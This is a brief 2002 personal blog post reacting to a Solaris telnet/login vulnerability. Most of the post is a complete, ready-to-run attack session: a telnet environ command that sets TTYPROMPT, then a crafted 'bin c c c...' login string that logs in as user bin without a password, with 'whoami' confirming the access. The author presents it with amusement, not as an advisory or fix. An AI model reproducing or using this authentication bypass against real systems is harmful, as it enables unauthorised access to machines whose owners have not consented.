christopher heiser <christopher AT heiser DOT net>
Date Published: October 7th, 2002
home
archive
rss feed
heiserlink

nürburgring
for dummies
about me
public key

Oracle on Linux Suddenly Doesn't Sound So Bad

You have got to be kidding me. This gaping security hole in Solaris made my jaw drop. Ready, kids?

There is no exploit code required.

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

Amazing! Thanks to Mr. Garvey for the tip.

by Christopher Heiser on October 7 19:13
© Copyright 1992-2021, Christopher Heiser. All rights reserved. Powered by Chlogger!